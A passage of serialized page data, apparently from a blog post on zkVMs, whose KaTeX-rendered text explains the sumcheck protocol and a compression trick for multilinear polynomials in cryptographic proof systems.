:301,"props":115953,"children":115955},{"className":115954},[10946,10883],[115956],{"type":30,"value":10949},{"type":24,"tag":301,"props":115958,"children":115960},{"className":115959},[10835,10883],[115961],{"type":30,"value":546},{"type":24,"tag":301,"props":115963,"children":115965},{"className":115964},[28508,10883],[115966],{"type":30,"value":40889},{"type":24,"tag":301,"props":115968,"children":115970},{"className":115969},[28514],[115971],{"type":30,"value":28517},{"type":24,"tag":301,"props":115973,"children":115975},{"className":115974},[10860],[115976],{"type":24,"tag":301,"props":115977,"children":115979},{"className":115978,"style":28525},[10865],[115980],{"type":24,"tag":301,"props":115981,"children":115982},{},[],{"type":24,"tag":301,"props":115984,"children":115986},{"className":115985,"style":10953},[10914],[],{"type":24,"tag":301,"props":115988,"children":115990},{"className":115989,"style":100230},[10835,28357],[115991],{"type":30,"value":777},{"type":24,"tag":301,"props":115993,"children":115995},{"className":115994},[28486],[115996],{"type":30,"value":362},{"type":24,"tag":301,"props":115998,"children":116000},{"className":115999},[10835],[116001,116006],{"type":24,"tag":301,"props":116002,"children":116004},{"className":116003},[10835,28357],[116005],{"type":30,"value":26050},{"type":24,"tag":301,"props":116007,"children":116009},{"className":116008},[10850],[116010],{"type":24,"tag":301,"props":116011,"children":116013},{"className":116012},[10855,28411],[116014,116043],{"type":24,"tag":301,"props":116015,"children":116017},{"className":116016},[10860],[116018,116038],{"type":24,"tag":301,"props":116019,"children":116021},{"className":116020,"style":99797},[10865],[116022],{"type":24,"tag":301,"props":116023,"children":116024},{"style":99801},[116025,116029],{"type":24,"tag":301,"props":116026,"children":116028},{"className":116027,"style":10875},[10874],[],{"type":24,"tag":301,"props":116030,"children":116032},{"className":116031},[10880,10881,10882,10883],[116033],{"type":24,"tag":301,"props":116034,"children":116036},{"className":116035},[10835,10883],[116037],{"type":30,"value":546},{"type":24,"tag":301,"props":116039,"children":116041},{"className":116040},[28514],[116042],{"type":30,"value":28517},{"type":24,"tag":301,"props":116044,"children":116046},{"className":116045},[10860],[116047],{"type":24,"tag":301,"props":116048,"children":116050},{"className":116049,"style":99828},[10865],[116051],{"type":24,"tag":301,"props":116052,"children":116053},{},[],{"type":24,"tag":301,"props":116055,"children":116057},{"className":116056},[10946],[116058],{"type":30,"value":10949},{"type":24,"tag":301,"props":116060,"children":116062},{"className":116061,"style":10953},[10914],[],{"type":24,"tag":301,"props":116064,"children":116066},{"className":116065},[10835],[116067,116072],{"type":24,"tag":301,"props":116068,"children":116070},{"className":116069},[10835,28357],[116071],{"type":30,"value":26050},{"type":24,"tag":301,"props":116073,"children":116075},{"className":116074},[10850],[116076],{"type":24,"tag":301,"props":116077,"children":116079},{"className":116078},[10855,28411],[116080,116109],{"type":24,"tag":301,"props":116081,"children":116083},{"className":116082},[10860],[116084,116104],{"type":24,"tag":301,"props":116085,"children":116087},{"className":116086,"style":99797},[10865],[116088],{"type":24,"tag":301,"props":116089,"children":116090},{"style":99801},[116091,116095],{"type":24,"tag":301,"props":116092,"children":116094},{"className":116093,"style":10875},[10874],[],{"type":24,"tag":301,"props":116096,"children":116098},{"className":116097},[10880,10881,10882,10883],[116099],{"type":24,"tag":301,"props":116100,"children":116102},{"className":116101},[10835,10883],[116103],{"type":30,"value":1503},{"type":24,"tag":301,"props":116105,"children":116107},{"className":116106},[28514],[116108],{"type":30,"value":28517},{"type":24,"tag":301,"props":116110,"children":116112},{"className":116111},[10860],[116113],{"type":24,"tag":301,"props":116114,"children":116116},{"className":116115,"style":99828},[10865],[116117],{"type":24,"tag":301,"props":116118,"children":116119},{},[],{"type":24,"tag":301,"props":116121,"children":116123},{"className":116122},[10946],[116124],{"type":30,"value":10949},{"type":24,"tag":301,"props":116126,"children":116128},{"className":116127,"style":10953},[10914],[],{"type":24,"tag":301,"props":116130,"children":116132},{"className":116131},[115831],[116133],{"type":30,"value":116134},"…",{"type":24,"tag":301,"props":116136,"children":116138},{"className":116137,"style":10953},[10914],[],{"type":24,"tag":301,"props":116140,"children":116142},{"className":116141},[10946],[116143],{"type":30,"value":10949},{"type":24,"tag":301,"props":116145,"children":116147},{"className":116146,"style":10953},[10914],[],{"type":24,"tag":301,"props":116149,"children":116151},{"className":116150},[10835],[116152,116157],{"type":24,"tag":301,"props":116153,"children":116155},{"className":116154},[10835,28357],[116156],{"type":30,"value":26050},{"type":24,"tag":301,"props":116158,"children":116160},{"className":116159},[10850],[116161],{"type":24,"tag":301,"props":116162,"children":116164},{"className":116163},[10855,28411],[116165,116195],{"type":24,"tag":301,"props":116166,"children":116168},{"className":116167},[10860],[116169,116190],{"type":24,"tag":301,"props":116170,"children":116173},{"className":116171,"style":116172},[10865],"height:0.1514em;",[116174],{"type":24,"tag":301,"props":116175,"children":116176},{"style":99801},[116177,116181],{"type":24,"tag":301,"props":116178,"children":116180},{"className":116179,"style":10875},[10874],[],{"type":24,"tag":301,"props":116182,"children":116184},{"className":116183},[10880,10881,10882,10883],[116185],{"type":24,"tag":301,"props":116186,"children":116188},{"className":116187},[10835,28357,10883],[116189],{"type":30,"value":63123},{"type":24,"tag":301,"props":116191,"children":116193},{"className":116192},[28514],[116194],{"type":30,"value":28517},{"type":24,"tag":301,"props":116196,"children":116198},{"className":116197},[10860],[116199],{"type":24,"tag":301,"props":116200,"children":116202},{"className":116201,"style":99828},[10865],[116203],{"type":24,"tag":301,"props":116204,"children":116205},{},[],{"type":24,"tag":301,"props":116207,"children":116209},{"className":116208},[28508],[116210],{"type":30,"value":9961},{"type":24,"tag":32,"props":116212,"children":116213},{},[116214,116216,116277],{"type":30,"value":116215},"The naive approach would be for the verifier to compute all ",{"type":24,"tag":145,"props":116217,"children":116219},{"className":116218},[10807,10808],[116220],{"type":24,"tag":301,"props":116221,"children":116223},{"className":116222},[10813],[116224],{"type":24,"tag":301,"props":116225,"children":116227},{"className":116226,"ariaHidden":10819},[10818],[116228],{"type":24,"tag":301,"props":116229,"children":116231},{"className":116230},[10824],[116232,116236],{"type":24,"tag":301,"props":116233,"children":116235},{"className":116234,"style":115458},[10829],[],{"type":24,"tag":301,"props":116237,"children":116239},{"className":116238},[10835],[116240,116245],{"type":24,"tag":301,"props":116241,"children":116243},{"className":116242},[10835],[116244],{"type":30,"value":1503},{"type":24,"tag":301,"props":116246,"children":116248},{"className":116247},[10850],[116249],{"type":24,"tag":301,"props":116250,"children":116252},{"className":116251},[10855],[116253],{"type":24,"tag":301,"props":116254,"children":116256},{"className":116255},[10860],[116257],{"type":24,"tag":301,"props":116258,"children":116260},{"className":116259,"style":115458},[10865],[116261],{"type":24,"tag":301,"props":116262,"children":116263},{"style":10869},[116264,116268],{"type":24,"tag":301,"props":116265,"children":116267},{"className":116266,"style":10875},[10874],[],{"type":24,"tag":301,"props":116269,"children":116271},{"className":116270},[10880,10881,10882,10883],[116272],{"type":24,"tag":301,"props":116273,"children":116275},{"className":116274},[10835,28357,10883],[116276],{"type":30,"value":63123},{"type":30,"value":116278}," evaluations. This is exponentially expensive.",{"type":24,"tag":32,"props":116280,"children":116281},{},[116282,116284,116289],{"type":30,"value":116283},"The sumcheck protocol is a clever interactive protocol that reduces the exponential number of polynomial evaluations to checking ",{"type":24,"tag":60,"props":116285,"children":116286},{},[116287],{"type":30,"value":116288},"only one",{"type":30,"value":206},{"type":24,"tag":32,"props":116291,"children":116292},{},[116293],{"type":24,"tag":177,"props":116294,"children":116297},{"alt":116295,"src":116296},"sumcheck_v2","/posts/zkvms-unfaithful-claims/sumcheck_v2.svg",[],{"type":24,"tag":32,"props":116299,"children":116300},{},[116301,116303,116395,116397,116582,116584,116609,116611,116689,116691,116770],{"type":30,"value":116302},"In each round, the prover must send a polynomial ",{"type":24,"tag":145,"props":116304,"children":116306},{"className":116305},[10807,10808],[116307],{"type":24,"tag":301,"props":116308,"children":116310},{"className":116309},[10813],[116311],{"type":24,"tag":301,"props":116312,"children":116314},{"className":116313,"ariaHidden":10819},[10818],[116315],{"type":24,"tag":301,"props":116316,"children":116318},{"className":116317},[10824],[116319,116323,116380,116385,116390],{"type":24,"tag":301,"props":116320,"children":116322},{"className":116321,"style":10935},[10829],[],{"type":24,"tag":301,"props":116324,"children":116326},{"className":116325},[10835],[116327,116332],{"type":24,"tag":301,"props":116328,"children":116330},{"className":116329,"style":100230},[10835,28357],[116331],{"type":30,"value":777},{"type":24,"tag":301,"props":116333,"children":116335},{"className":116334},[10850],[116336],{"type":24,"tag":301,"props":116337,"children":116339},{"className":116338},[10855,28411],[116340,116369],{"type":24,"tag":301,"props":116341,"children":116343},{"className":116342},[10860],[116344,116364],{"type":24,"tag":301,"props":116345,"children":116347},{"className":116346,"style":100273},[10865],[116348],{"type":24,"tag":301,"props":116349,"children":116350},{"style":100277},[116351,116355],{"type":24,"tag":301,"props":116352,"children":116354},{"className":116353,"style":10875},[10874],[],{"type":24,"tag":301,"props":116356,"children":116358},{"className":116357},[10880,10881,10882,10883],[116359],{"type":24,"tag":301,"props":116360,"children":116362},{"className":116361},[10835,28357,10883],[116363],{"type":30,"value":10564},{"type":24,"tag":301,"props":116365,"children":116367},{"className":116366},[28514],[116368],{"type":30,"value":28517},{"type":24,"tag":301,"props":116370,"children":116372},{"className":116371},[10860],[116373],{"type":24,"tag":301,"props":116374,"children":116376},{"className":116375,"style":99828},[10865],[116377],{"type":24,"tag":301,"props":116378,"children":116379},{},[],{"type":24,"tag":301,"props":116381,"children":116383},{"className":116382},[28486],[116384],{"type":30,"value":362},{"type":24,"tag":301,"props":116386,"children":116388},{"className":116387,"style":101764},[10835,28357],[116389],{"type":30,"value":12952},{"type":24,"tag":301,"props":116391,"children":116393},{"className":116392},[28508],[116394],{"type":30,"value":9961},{"type":30,"value":116396}," such that ",{"type":24,"tag":145,"props":116398,"children":116400},{"className":116399},[10807,10808],[116401],{"type":24,"tag":301,"props":116402,"children":116404},{"className":116403},[10813],[116405],{"type":24,"tag":301,"props":116406,"children":116408},{"className":116407,"ariaHidden":10819},[10818],[116409,116502],{"type":24,"tag":301,"props":116410,"children":116412},{"className":116411},[10824],[116413,116417,116474,116479,116484,116489,116493,116498],{"type":24,"tag":301,"props":116414,"children":116416},{"className":116415,"style":10935},[10829],[],{"type":24,"tag":301,"props":116418,"children":116420},{"className":116419},[10835],[116421,116426],{"type":24,"tag":301,"props":116422,"children":116424},{"className":116423,"style":100230},[10835,28357],[116425],{"type":30,"value":777},{"type":24,"tag":301,"props":116427,"children":116429},{"className":116428},[10850],[116430],{"type":24,"tag":301,"props":116431,"children":116433},{"className":116432},[10855,28411],[116434,116463],{"type":24,"tag":301,"props":116435,"children":116437},{"className":116436},[10860],[116438,116458],{"type":24,"tag":301,"props":116439,"children":116441},{"className":116440,"style":100273},[10865],[116442],{"type":24,"tag":301,"props":116443,"children":116444},{"style":100277},[116445,116449],{"type":24,"tag":301,"props":116446,"children":116448},{"className":116447,"style":10875},[10874],[],{"type":24,"tag":301,"props":116450,"children":116452},{"className":116451},[10880,10881,10882,10883],[116453],{"type":24,"tag":301,"props":116454,"children":116456},{"className":116455},[10835,28357,10883],[116457],{"type":30,"value":10564},{"type":24,"tag":301,"props":116459,"children":116461},{"className":116460},[28514],[116462],{"type":30,"value":28517},{"type":24,"tag":301,"props":116464,"children":116466},{"className":116465},[10860],[116467],{"type":24,"tag":301,"props":116468,"children":116470},{"className":116469,"style":99828},[10865],[116471],{"type":24,"tag":301,"props":116472,"children":116473},{},[],{"type":24,"tag":301,"props":116475,"children":116477},{"className":116476},[28486],[116478],{"type":30,"value":362},{"type":24,"tag":301,"props":116480,"children":116482},{"className":116481},[10835],[116483],{"type":30,"value":584},{"type":24,"tag":301,"props":116485,"children":116487},{"className":116486},[28508],[116488],{"type":30,"value":9961},{"type":24,"tag":301,"props":116490,"children":116492},{"className":116491,"style":10915},[10914],[],{"type":24,"tag":301,"props":116494,"children":116496},{"className":116495},[10920],[116497],{"type":30,"value":11206},{"type":24,"tag":301,"props":116499,"children":116501},{"className":116500,"style":10915},[10914],[],{"type":24,"tag":301,"props":116503,"children":116505},{"className":116504},[10824],[116506,116510,116567,116572,116577],{"type":24,"tag":301,"props":116507,"children":116509},{"className":116508,"style":10935},[10829],[],{"type":24,"tag":301,"props":116511,"children":116513},{"className":116512},[10835],[116514,116519],{"type":24,"tag":301,"props":116515,"children":116517},{"className":116516,"style":100230},[10835,28357],[116518],{"type":30,"value":777},{"type":24,"tag":301,"props":116520,"children":116522},{"className":116521},[10850],[116523],{"type":24,"tag":301,"props":116524,"children":116526},{"className":116525},[10855,28411],[116527,116556],{"type":24,"tag":301,"props":116528,"children":116530},{"className":116529},[10860],[116531,116551],{"type":24,"tag":301,"props":116532,"children":116534},{"className":116533,"style":100273},[10865],[116535],{"type":24,"tag":301,"props":116536,"children":116537},{"style":100277},[116538,116542],{"type":24,"tag":301,"props":116539,"children":116541},{"className":116540,"style":10875},[10874],[],{"type":24,"tag":301,"props":116543,"children":116545},{"className":116544},[10880,10881,10882,10883],[116546],{"type":24,"tag":301,"props":116547,"children":116549},{"className":116548},[10835,28357,10883],[116550],{"type":30,"value":10564},{"type":24,"tag":301,"props":116552,"children":116554},{"className":116553},[28514],[116555],{"type":30,"value":28517},{"type":24,"tag":301,"props":116557,"children":116559},{"className":116558},[10860],[116560],{"type":24,"tag":301,"props":116561,"children":116563},{"className":116562,"style":99828},[10865],[116564],{"type":24,"tag":301,"props":116565,"children":116566},{},[],{"type":24,"tag":301,"props":116568,"children":116570},{"className":116569},[28486],[116571],{"type":30,"value":362},{"type":24,"tag":301,"props":116573,"children":116575},{"className":116574},[10835],[116576],{"type":30,"value":546},{"type":24,"tag":301,"props":116578,"children":116580},{"className":116579},[28508],[116581],{"type":30,"value":9961},{"type":30,"value":116583}," equals the previous claim. If the prover is lying about the original sum ",{"type":24,"tag":145,"props":116585,"children":116587},{"className":116586},[10807,10808],[116588],{"type":24,"tag":301,"props":116589,"children":116591},{"className":116590},[10813],[116592],{"type":24,"tag":301,"props":116593,"children":116595},{"className":116594,"ariaHidden":10819},[10818],[116596],{"type":24,"tag":301,"props":116597,"children":116599},{"className":116598},[10824],[116600,116604],{"type":24,"tag":301,"props":116601,"children":116603},{"className":116602,"style":28352},[10829],[],{"type":24,"tag":301,"props":116605,"children":116607},{"className":116606,"style":99979},[10835,28357],[116608],{"type":30,"value":99982},{"type":30,"value":116610},", then they must lie about ",{"type":24,"tag":145,"props":116612,"children":116614},{"className":116613},[10807,10808],[116615],{"type":24,"tag":301,"props":116616,"children":116618},{"className":116617},[10813],[116619],{"type":24,"tag":301,"props":116620,"children":116622},{"className":116621,"ariaHidden":10819},[10818],[116623],{"type":24,"tag":301,"props":116624,"children":116626},{"className":116625},[10824],[116627,116632],{"type":24,"tag":301,"props":116628,"children":116631},{"className":116629,"style":116630},[10829],"height:0.625em;vertical-align:-0.1944em;",[],{"type":24,"tag":301,"props":116633,"children":116635},{"className":116634},[10835],[116636,116641],{"type":24,"tag":301,"props":116637,"children":116639},{"className":116638,"style":100230},[10835,28357],[116640],{"type":30,"value":777},{"type":24,"tag":301,"props":116642,"children":116644},{"className":116643},[10850],[116645],{"type":24,"tag":301,"props":116646,"children":116648},{"className":116647},[10855,28411],[116649,116678],{"type":24,"tag":301,"props":116650,"children":116652},{"className":116651},[10860],[116653,116673],{"type":24,"tag":301,"props":116654,"children":116656},{"className":116655,"style":100273},[10865],[116657],{"type":24,"tag":301,"props":116658,"children":116659},{"style":100277},[116660,116664],{"type":24,"tag":301,"props":116661,"children":116663},{"className":116662,"style":10875},[10874],[],{"type":24,"tag":301,"props":116665,"children":116667},{"className":116666},[10880,10881,10882,10883],[116668],{"type":24,"tag":301,"props":116669,"children":116671},{"className":116670},[10835,28357,10883],[116672],{"type":30,"value":10564},{"type":24,"tag":301,"props":116674,"children":116676},{"className":116675},[28514],[116677],{"type":30,"value":28517},{"type":24,"tag":301,"props":116679,"children":116681},{"className":116680},[10860],[116682],{"type":24,"tag":301,"props":116683,"children":116685},{"className":116684,"style":99828},[10865],[116686],{"type":24,"tag":301,"props":116687,"children":116688},{},[],{"type":30,"value":116690}," somewhere. But since the verifier picks a random ",{"type":24,"tag":145,"props":116692,"children":116694},{"className":116693},[10807,10808],[116695],{"type":24,"tag":301,"props":116696,"children":116698},{"className":116697},[10813],[116699],{"type":24,"tag":301,"props":116700,"children":116702},{"className":116701,"ariaHidden":10819},[10818],[116703],{"type":24,"tag":301,"props":116704,"children":116706},{"className":116705},[10824],[116707,116712],{"type":24,"tag":301,"props":116708,"children":116711},{"className":116709,"style":116710},[10829],"height:0.5806em;vertical-align:-0.15em;",[],{"type":24,"tag":301,"props":116713,"children":116715},{"className":116714},[10835],[116716,116721],{"type":24,"tag":301,"props":116717,"children":116719},{"className":116718,"style":99745},[10835,28357],[116720],{"type":30,"value":100563},{"type":24,"tag":301,"props":116722,"children":116724},{"className":116723},[10850],[116725],{"type":24,"tag":301,"props":116726,"children":116728},{"className":116727},[10855,28411],[116729,116759],{"type":24,"tag":301,"props":116730,"children":116732},{"className":116731},[10860],[116733,116754],{"type":24,"tag":301,"props":116734,"children":116736},{"className":116735,"style":100273},[10865],[116737],{"type":24,"tag":301,"props":116738,"children":116740},{"style":116739},"top:-2.55em;margin-left:-0.0278em;margin-right:0.05em;",[116741,116745],{"type":24,"tag":301,"props":116742,"children":116744},{"className":116743,"style":10875},[10874],[],{"type":24,"tag":301,"props":116746,"children":116748},{"className":116747},[10880,10881,10882,10883],[116749],{"type":24,"tag":301,"props":116750,"children":116752},{"className":116751},[10835,28357,10883],[116753],{"type":30,"value":10564},{"type":24,"tag":301,"props":116755,"children":116757},{"className":116756},[28514],[116758],{"type":30,"value":28517},{"type":24,"tag":301,"props":116760,"children":116762},{"className":116761},[10860],[116763],{"type":24,"tag":301,"props":116764,"children":116766},{"className":116765,"style":99828},[10865],[116767],{"type":24,"tag":301,"props":116768,"children":116769},{},[],{"type":30,"value":116771},", with overwhelming probability, the prover won't then be able to match the evaluation of the original polynomial.",{"type":24,"tag":270,"props":116773,"children":116775},{"id":116774},"the-compression-trick",[116776],{"type":30,"value":116777},"The Compression Trick",{"type":24,"tag":32,"props":116779,"children":116780},{},[116781,116783,116933,116935,117215],{"type":30,"value":116782},"For degree-1 (multilinear) polynomials, ",{"type":24,"tag":145,"props":116784,"children":116786},{"className":116785},[10807,10808],[116787],{"type":24,"tag":301,"props":116788,"children":116790},{"className":116789},[10813],[116791],{"type":24,"tag":301,"props":116792,"children":116794},{"className":116793,"ariaHidden":10819},[10818],[116795,116888,116915],{"type":24,"tag":301,"props":116796,"children":116798},{"className":116797},[10824],[116799,116803,116860,116865,116870,116875,116879,116884],{"type":24,"tag":301,"props":116800,"children":116802},{"className":116801,"style":10935},[10829],[],{"type":24,"tag":301,"props":116804,"children":116806},{"className":116805},[10835],[116807,116812],{"type":24,"tag":301,"props":116808,"children":116810},{"className":116809,"style":100230},[10835,28357],[116811],{"type":30,"value":777},{"type":24,"tag":301,"props":116813,"children":116815},{"className":116814},[10850],[116816],{"type":24,"tag":301,"props":116817,"children":116819},{"className":116818},[10855,28411],[116820,116849],{"type":24,"tag":301,"props":116821,"children":116823},{"className":116822},[10860],[116824,116844],{"type":24,"tag":301,"props":116825,"children":116827},{"className":116826,"style":100273},[10865],[116828],{"type":24,"tag":301,"props":116829,"children":116830},{"style":100277},[116831,116835],{"type":24,"tag":301,"props":116832,"children":116834},{"className":116833,"style":10875},[10874],[],{"type":24,"tag":301,"props":116836,"children":116838},{"className":116837},[10880,10881,10882,10883],[116839],{"type":24,"tag":301,"props":116840,"children":116842},{"className":116841},[10835,28357,10883],[116843],{"type":30,"value":10564},{"type":24,"tag":301,"props":116845,"children":116847},{"className":116846},[28514],[116848],{"type":30,"value":28517},{"type":24,"tag":301,"props":116850,"children":116852},{"className":116851},[10860],[116853],{"type":24,"tag":301,"props":116854,"children":116856},{"className":116855,"style":99828},[10865],[116857],{"type":24,"tag":301,"props":116858,"children":116859},{},[],{"type":24,"tag":301,"props":116861,"children":116863},{"className":116862},[28486],[116864],{"type":30,"value":362},{"type":24,"tag":301,"props":116866,"children":116868},{"className":116867,"style":101764},[10835,28357],[116869],{"type":30,"value":12952},{"type":24,"tag":301,"props":116871,"children":116873},{"className":116872},[28508],[116874],{"type":30,"value":9961},{"type":24,"tag":301,"props":116876,"children":116878},{"className":116877,"style":11012},[10914],[],{"type":24,"tag":301,"props":116880,"children":116882},{"className":116881},[11017],[116883],{"type":30,"value":523},{"type":24,"tag":301,"props":116885,"children":116887},{"className":116886,"style":11012},[10914],[],{"type":24,"tag":301,"props":116889,"children":116891},{"className":116890},[10824],[116892,116897,116902,116906,116911],{"type":24,"tag":301,"props":116893,"children":116896},{"className":116894,"style":116895},[10829],"height:0.6667em;vertical-align:-0.0833em;",[],{"type":24,"tag":301,"props":116898,"children":116900},{"className":116899},[10835,28357],[116901],{"type":30,"value":188},{"type":24,"tag":301,"props":116903,"children":116905},{"className":116904,"style":10915},[10914],[],{"type":24,"tag":301,"props":116907,"children":116909},{"className":116908},[10920],[116910],{"type":30,"value":11206},{"type":24,"tag":301,"props":116912,"children":116914},{"className":116913,"style":10915},[10914],[],{"type":24,"tag":301,"props":116916,"children":116918},{"className":116917},[10824],[116919,116923,116928],{"type":24,"tag":301,"props":116920,"children":116922},{"className":116921,"style":99660},[10829],[],{"type":24,"tag":301,"props":116924,"children":116926},{"className":116925},[10835,28357],[116927],{"type":30,"value":5613},{"type":24,"tag":301,"props":116929,"children":116931},{"className":116930,"style":101764},[10835,28357],[116932],{"type":30,"value":12952},{"type":30,"value":116934}," has only two coefficients. Since the verifier knows ",{"type":24,"tag":145,"props":116936,"children":116938},{"className":116937},[10807,10808],[116939],{"type":24,"tag":301,"props":116940,"children":116942},{"className":116941},[10813],[116943],{"type":24,"tag":301,"props":116944,"children":116946},{"className":116945,"ariaHidden":10819},[10818],[116947,117040,117133],{"type":24,"tag":301,"props":116948,"children":116950},{"className":116949},[10824],[116951,116955,117012,117017,117022,117027,117031,117036],{"type":24,"tag":301,"props":116952,"children":116954},{"className":116953,"style":10935},[10829],[],{"type":24,"tag":301,"props":116956,"children":116958},{"className":116957},[10835],[116959,116964],{"type":24,"tag":301,"props":116960,"children":116962},{"className":116961,"style":100230},[10835,28357],[116963],{"type":30,"value":777},{"type":24,"tag":301,"props":116965,"children":116967},{"className":116966},[10850],[116968],{"type":24,"tag":301,"props":116969,"children":116971},{"className":116970},[10855,28411],[116972,117001],{"type":24,"tag":301,"props":116973,"children":116975},{"className":116974},[10860],[116976,116996],{"type":24,"tag":301,"props":116977,"children":116979},{"className":116978,"style":100273},[10865],[116980],{"type":24,"tag":301,"props":116981,"children":116982},{"style":100277},[116983,116987],{"type":24,"tag":301,"props":116984,"children":116986},{"className":116985,"style":10875},[10874],[],{"type":24,"tag":301,"props":116988,"children":116990},{"className":116989},[10880,10881,10882,10883],[116991],{"type":24,"tag":301,"props":116992,"children":116994},{"className":116993},[10835,28357,10883],[116995],{"type":30,"value":10564},{"type":24,"tag":301,"props":116997,"children":116999},{"className":116998},[28514],[117000],{"type":30,"value":28517},{"type":24,"tag":301,"props":117002,"children":117004},{"className":117003},[10860],[117005],{"type":24,"tag":301,"props":117006,"children":117008},{"className":117007,"style":99828},[10865],[117009],{"type":24,"tag":301,"props":117010,"children":117011},{},[],{"type":24,"tag":301,"props":117013,"children":117015},{"className":117014},[28486],[117016],{"type":30,"value":362},{"type":24,"tag":301,"props":117018,"children":117020},{"className":117019},[10835],[117021],{"type":30,"value":584},{"type":24,"tag":301,"props":117023,"children":117025},{"className":117024},[28508],[117026],{"type":30,"value":9961},{"type":24,"tag":301,"props":117028,"children":117030},{"className":117029,"style":10915},[10914],[],{"type":24,"tag":301,"props":117032,"children":117034},{"className":117033},[10920],[117035],{"type":30,"value":11206},{"type":24,"tag":301,"props":117037,"children":117039},{"className":117038,"style":10915},[10914],[],{"type":24,"tag":301,"props":117041,"children":117043},{"className":117042},[10824],[117044,117048,117105,117110,117115,117120,117124,117129],{"type":24,"tag":301,"props":117045,"children":117047},{"className":117046,"style":10935},[10829],[],{"type":24,"tag":301,"props":117049,"children":117051},{"className":117050},[10835],[117052,117057],{"type":24,"tag":301,"props":117053,"children":117055},{"className":117054,"style":100230},[10835,28357],[117056],{"type":30,"value":777},{"type":24,"tag":301,"props":117058,"children":117060},{"className":117059},[10850],[117061],{"type":24,"tag":301,"props":117062,"children":117064},{"className":117063},[10855,28411],[117065,117094],{"type":24,"tag":301,"props":117066,"children":117068},{"className":117067},[10860],[117069,117089],{"type":24,"tag":301,"props":117070,"children":117072},{"className":117071,"style":100273},[10865],[117073],{"type":24,"tag":301,"props":117074,"children":117075},{"style":100277},[117076,117080],{"type":24,"tag":301,"props":117077,"children":117079},{"className":117078,"style":10875},[10874],[],{"type":24,"tag":301,"props":117081,"children":117083},{"className":117082},[10880,10881,10882,10883],[117084],{"type":24,"tag":301,"props":117085,"children":117087},{"className":117086},[10835,28357,10883],[117088],{"type":30,"value":10564},{"type":24,"tag":301,"props":117090,"children":117092},{"className":117091},[28514],[117093],{"type":30,"value":28517},{"type":24,"tag":301,"props":117095,"children":117097},{"className":117096},[10860],[117098],{"type":24,"tag":301,"props":117099,"children":117101},{"className":117100,"style":99828},[10865],[117102],{"type":24,"tag":301,"props":117103,"children":117104},{},[],{"type":24,"tag":301,"props":117106,"children":117108},{"className":117107},[28486],[117109],{"type":30,"value":362},{"type":24,"tag":301,"props":117111,"children":117113},{"className":117112},[10835],[117114],{"type":30,"value":546},{"type":24,"tag":301,"props":117116,"children":117118},{"className":117117},[28508],[117119],{"type":30,"value":9961},{"type":24,"tag":301,"props":117121,"children":117123},{"className":117122,"style":11012},[10914],[],{"type":24,"tag":301,"props":117125,"children":117127},{"className":117126},[11017],[117128],{"type":30,"value":523},{"type":24,"tag":301,"props":117130,"children":117132},{"className":117131,"style":11012},[10914],[],{"type":24,"tag":301,"props":117134,"children":117136},{"className":117135},[10824],[117137,117142],{"type":24,"tag":301,"props":117138,"children":117141},{"className":117139,"style":117140},[10829],"height:0.8917em;vertical-align:-0.2083em;",[],{"type":24,"tag":301,"props":117143,"children":117145},{"className":117144},[10835],[117146,117151],{"type":24,"tag":301,"props":117147,"children":117149},{"className":117148,"style":99979},[10835,28357],[117150],{"type":30,"value":99982},{"type":24,"tag":301,"props":117152,"children":117154},{"className":117153},[10850],[117155],{"type":24,"tag":301,"props":117156,"children":117158},{"className":117157},[10855,28411],[117159,117203],{"type":24,"tag":301,"props":117160,"children":117162},{"className":117161},[10860],[117163,117198],{"type":24,"tag":301,"props":117164,"children":117166},{"className":117165,"style":100273},[10865],[117167],{"type":24,"tag":301,"props":117168,"children":117170},{"style":117169},"top:-2.55em;margin-left:-0.0813em;margin-right:0.05em;",[117171,117175],{"type":24,"tag":301,"props":117172,"children":117174},{"className":117173,"style":10875},[10874],[],{"type":24,"tag":301,"props":117176,"children":117178},{"className":117177},[10880,10881,10882,10883],[117179],{"type":24,"tag":301,"props":117180,"children":117182},{"className":117181},[10835,10883],[117183,117188,117193],{"type":24,"tag":301,"props":117184,"children":117186},{"className":117185},[10835,28357,10883],[117187],{"type":30,"value":10564},{"type":24,"tag":301,"props":117189,"children":117191},{"className":117190},[10920,10883],[117192],{"type":30,"value":10894},{"type":24,"tag":301,"props":117194,"children":117196},{"className":117195},[10835,10883],[117197],{"type":30,"value":546},{"type":24,"tag":301,"props":117199,"children":117201},{"className":117200},[28514],[117202],{"type":30,"value":28517},{"type":24,"tag":301,"props":117204,"children":117206},{"className":117205},[10860],[117207],{"type":24,"tag":301,"props":117208,"children":117211},{"className":117209,"style":117210},[10865],"height:0.2083em;",[117212],{"type":24,"tag":301,"props":117213,"children":117214},{},[],{"type":30,"value":117216}," (the previous claim), we have:",{"type":24,"tag":32,"props":117218,"children":117219},{},[117220],{"type":24,"tag":145,"props":117221,"children":117223},{"className":117222},[10807,10808],[117224],{"type":24,"tag":301,"props":117225,"children":117227},{"className":117226},[10813],[117228],{"type":24,"tag":301,"props":117229,"children":117231},{"className":117230,"ariaHidden":10819},[10818],[117232,117258,117289,117320,117421,117447,117539],{"type":24,"tag":301,"props":117233,"children":117235},{"className":117234},[10824],[117236,117240,117245,117249,117254],{"type":24,"tag":301,"props":117237,"children":117239},{"className":117238,"style":116895},[10829],[],{"type":24,"tag":301,"props":117241,"children":117243},{"className":117242},[10835,28357],[117244],{"type":30,"value":188},{"type":24,"tag":301,"props":117246,"children":117248},{"className":117247,"style":10915},[10914],[],{"type":24,"tag":301,"props":117250,"children":117252},{"className":117251},[10920],[117253],{"type":30,"value":11206},{"type":24,"tag":301,"props":117255,"children":117257},{"className":117256,"style":10915},[10914],[],{"type":24,"tag":301,"props":117259,"children":117261},{"className":117260},[10824],[117262,117266,117271,117276,117280,117285],{"type":24,"tag":301,"props":117263,"children":117265},{"className":117264,"style":10935},[10829],[],{"type":24,"tag":301,"props":117267,"children":117269},{"className":117268},[28486],[117270],{"type":30,"value":362},{"type":24,"tag":301,"props":117272,"children":117274},{"className":117273},[10835,28357],[117275],{"type":30,"value":188},{"type":24,"tag":301,"props":117277,"children":117279},{"className":117278,"style":10915},[10914],[],{"type":24,"tag":301,"props":117281,"children":117283},{"className":117282},[10920],[117284],{"type":30,"value":11206},{"type":24,"tag":301,"props":117286,"children":117288},{"className":117287,"style":10915},[10914],[],{"type":24,"tag":301,"props":117290,"children":117292},{"className":117291},[10824],[117293,117297,117302,117307,117311,117316],{"type":24,"tag":301,"props":117294,"children":117296},{"className":117295,"style":10935},[10829],[],{"type":24,"tag":301,"props":117298,"children":117300},{"className":117299},[10835,28357],[117301],{"type":30,"value":5613},{"type":24,"tag":301,"props":117303,"children":117305},{"className":117304},[28508],[117306],{"type":30,"value":9961},{"type":24,"